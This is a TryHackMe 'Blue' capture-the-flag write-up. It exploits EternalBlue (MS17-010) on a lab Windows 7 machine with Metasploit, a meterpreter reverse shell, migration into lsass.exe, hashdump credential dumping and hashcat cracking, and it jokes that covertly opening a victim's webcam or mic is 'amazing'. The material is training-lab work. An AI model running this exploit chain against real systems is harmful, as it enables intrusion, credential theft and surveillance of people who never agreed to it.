TryHackMe — Blue
Hello guys, what’s going on , this is shellbreak, and today I’ll be doing the Blue room from TryHackMe, which is a pretty easy and fun room that demonstrates how to exploit “eternal blue” vulnerability that affected SMB servers back in 2017.
EternalBlue is a cyberattack exploit developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft released patches for the vulnerability.
So, enough talking and let’s jump in.
As always we’re going to start off with nmap:
nmap -sC -sV -oA nmap/blue 10.10.128.47
Keep in mind that this IP address might be different in your case, as THM assigns random IPs each time a user fires up the VM.
As you can see we have a bunch of open ports, but since the room is labeled “Blue” and according to the image attached to the room, we’ll be focusing only on port (445 Windows 7 Professional 7601 Service Pack 1 microsoft-ds).
Now, there’re several exploit scripts available online, but I’ll be using metasploit to solve this room.
So, let’s fire up metasploit with the command:
msfconsole
Using the built-in search functionality in metasploit, we will search for “eternal blue”.
As you can see, metasploit gave us a bunch of results, but the one we need is:
exploit/windows/smb/ms17_010_eternalblue
using the command “use”, we will choose the module we want:
use exploit/windows/smb/ms17_010_eternalblue
Now, we need to provide some necessary values to the module so we can run it against our target:
show options
to view what values we need to assign.
The default payload for this exploit is:
windows/x64/meterpreter/reverse_tcp
but you can change it to whatever you like/want, but for me, I prefer using meterpreter shells as they have a lot of additional functionalities, not to mention that when I was taking an Ethical hacking course provided by the company I work at, the mentor said that in real life pentests, it’s prefered to use meterpreter shells because they make it easy to do additional stuff on the target system, like installing mimikatz to dump hashes and plaintext passwords from the system, along with other utilities that enables the pentester to open mic or open webcam on the target system.
Although in real life penetration tests, it’s not required (and not ethical) to open mic and record voice/video from the target system.
But let’s be honest, being able to do so is AMAZING isn’t it? ;)
Back to our target machine, we need to set a bunch of variables to perform our attack.
We assigned the machine’s IP to RHOSTS variable, and our own IP to LHOST, for LPORT you don’t need to change that but I prefer using port 9001 for some reason (maybe because my almight mentor Ippsec uses it :P).
In the case of this box, we don’t need to change the value of RPORT as the vulnerable service (SMB) is running on port 445, but if you were exploiting a target that uses different port to run SMB, you need to change the default value of RPORT variable, so that’s all for now, go ahead and run the exploit using one of these two commands (run/exploit).
And, our exploit worked just fine and we managed to land a meterpreter shell on the box.
For me, whenever I get a shell on a target box, I run 2 commands:
1- getuid
2- getprivs
The first command is similar to “whoami” command, and the second one gives us the permissions of the current user.
As we see in the picture, we got AUTHORITY\SYSTEM user, but we don’t have much privileges. Don’t worry, we don’t need to escalate to obtain more privileges, as we already owned root privileges ;)
But, in some cases, you might want to run some scripts to find privesc vectors, but in this box, we don’t need to.
All we need is to migrate to a more privileged service to obtain the privs we want.
ps
The above command lists processes, which we can use (migrate to).
The perfect process to choose is “lsass.exe” as it’s the process responsible for authentication mechanisms.
migrate -N process_name
Now let’s use the “help” command to see what else we can do on this box.
It gives us a lot of options, but in the case of this room, I’ll be using:
hashdump
to dump users’ hashes to crack them.
we will save this output as it is in a file, and use hashcat to crack them.
hashcat -m 1000 /usr/share/wordlists/rockyou.txt
I’ve already cracked them before writing this write-up.
Yay!!…
We see that the user Jon’s password cracked, now let’s look for the flags.
At this point, I ran “shell” command to get a regular cmd shell because it makes it easier to know where I am in the filesystem.
The 3rd flag can be found in:
C:\Users\Jon\Documents
The 1st flag can be found in the root directory:
C:\
For the last flag, according to the challenge, it’s stored in a location that windows doesn’t really like, and might occasionally delete it.
In Linux systems, there’s a command to search the whole filesystem for a specific file.
Its equivalent in windows is:
dir [filename] /s
So, using this command I found that the flag is stored in:
C:\Windows\System32\config
Yay!!!, we got all the flags ;)
So, that was the box, I hope you guys enjoyed it, and I’ll see you all in the next write-up.